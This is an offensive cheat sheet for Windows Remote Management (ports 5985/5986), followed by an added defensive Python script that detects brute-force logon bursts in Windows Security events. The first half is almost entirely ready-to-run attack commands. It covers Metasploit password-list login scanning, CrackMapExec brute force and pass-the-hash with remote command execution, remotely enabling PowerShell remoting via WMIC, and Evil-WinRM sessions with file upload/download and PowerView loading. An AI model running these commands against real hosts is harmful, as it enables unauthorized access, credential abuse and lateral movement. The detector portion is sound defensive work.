WinRM (TCP 5985 HTTP / 5986 HTTPS)

1. Metasploit - WinRM Login Scanner

use auxiliary/scanner/winrm/winrm_login
set RHOSTS 10.11.1.13
set USERNAME DISCO
set PASS_FILE /usr/share/wordlists/fasttrack.txt
set DOMAIN disco.thinc
run

2. Enable PowerShell Remoting Remotely Using WMIC (requires admin rights on the remote host)

wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"

3. Brute-force with CrackMapExec

  • Brute-force WinRM with a Username List and a Password List:

    crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
  • Check Credentials (Username + Password) and Execute CMD Command:

    crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password> -x "whoami"
  • Pass-the-Hash Authentication with PowerShell Command Execution:

    crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionTable'

4. Evil-WinRM

  • Connect with a Username and Password (-s sets the local directory that PowerShell scripts are loaded from):

    evil-winrm -i 10.10.10.10 -u redcliff -p "password123" -s .
  • Upload/Download Files:

    • Upload a file to the target:

      upload local_filename destination_filename
    • Download a file from the target:

      download remote_filename destination_filename
  • List All Services:

    services
  • Load Local PowerShell Scripts (type the file name of a script in the -s directory):

    Powerview.ps1
  • Menu Listing Loaded Modules: once inside Evil-WinRM, you can view the available modules and loaded functions:

    menu
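
Added example (not part of the original cheat sheet): the defender's counterpart to sections 1 and 3. Every WinRM authentication attempt, whether from the Metasploit login scanner, CrackMapExec or Evil-WinRM, lands on the target as a network logon (LogonType 3) in Security event 4625 (failure) or 4624 (success), which is what makes these tools noisy. The script below is a small detector that reads a flattened text export of those events, raises a "burst" alert when one source IP exceeds a failure threshold inside a sliding window, and a "success_after_burst" alert when a 4624 arrives from an IP still inside such a burst (the guess that worked). The line format and the sample events are constructed for this example; adapt parse_event to whatever your SIEM or EVTX export actually emits.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample lines (not real telemetry). Assumed format: a flattened
# text export of Windows Security events carrying the fields a WinRM
# brute-force hunt needs. WinRM authentication is recorded as a network
# logon (LogonType 3) in 4625 (failure) and 4624 (success) events.
SAMPLE_EVENTS = [
    "2024-01-01T10:00:00 EventID=4625 LogonType=3 IpAddress=10.11.1.50 TargetUserName=disco",
    "2024-01-01T10:00:02 EventID=4625 LogonType=3 IpAddress=10.11.1.50 TargetUserName=disco",
    "2024-01-01T10:00:04 EventID=4625 LogonType=3 IpAddress=10.11.1.50 TargetUserName=disco",
    "2024-01-01T10:00:05 EventID=4625 LogonType=3 IpAddress=10.11.1.51 TargetUserName=alice",  # one typo, benign
    "2024-01-01T10:00:06 EventID=4625 LogonType=3 IpAddress=10.11.1.50 TargetUserName=disco",
    "2024-01-01T10:00:07 EventID=4624 LogonType=2 IpAddress=127.0.0.1 TargetUserName=bob",    # console logon, ignored
    "2024-01-01T10:00:08 EventID=4625 LogonType=3 IpAddress=10.11.1.50 TargetUserName=disco",
    "2024-01-01T10:00:10 EventID=4624 LogonType=3 IpAddress=10.11.1.50 TargetUserName=disco",
    "garbage line that does not parse",
]

EVENT_RE = re.compile(
    r"^(?P<ts>\S+) EventID=(?P<event_id>\d+) LogonType=(?P<logon_type>\d+) "
    r"IpAddress=(?P<ip>\S+) TargetUserName=(?P<user>\S+)$"
)


def parse_event(line):
    """Return a dict for a recognised line, or None for anything else."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.fromisoformat(m.group("ts")),
        "event_id": int(m.group("event_id")),
        "logon_type": int(m.group("logon_type")),
        "ip": m.group("ip"),
        "user": m.group("user"),
    }


def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Flag (a) at least `threshold` failed network logons from one source IP
    inside `window`, and (b) a successful network logon from an IP that is
    still inside such a burst, i.e. the password or hash guess that worked."""
    recent_failures = defaultdict(deque)  # source IP -> timestamps of recent 4625s
    burst_reported = set()                # one burst alert per IP
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev is None or ev["logon_type"] != 3:
            continue  # only network logons are relevant to WinRM
        fails = recent_failures[ev["ip"]]
        while fails and ev["ts"] - fails[0] > window:
            fails.popleft()  # slide the window forward
        if ev["event_id"] == 4625:
            fails.append(ev["ts"])
            if len(fails) >= threshold and ev["ip"] not in burst_reported:
                burst_reported.add(ev["ip"])
                alerts.append({"kind": "burst", "ip": ev["ip"],
                               "count": len(fails), "ts": ev["ts"]})
        elif ev["event_id"] == 4624 and len(fails) >= threshold:
            alerts.append({"kind": "success_after_burst", "ip": ev["ip"],
                           "user": ev["user"], "count": len(fails), "ts": ev["ts"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_EVENTS):
        print(alert)
```

On the sample data the detector reports a burst from 10.11.1.50 after its fifth failure and then a success_after_burst for user disco two seconds later; the single failure from 10.11.1.51 and the console logon are ignored. Tune threshold and window to the environment: a domain with many scripted WinRM jobs needs a higher threshold, while a host that should only ever see a handful of admin sessions can alert on two or three failures.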
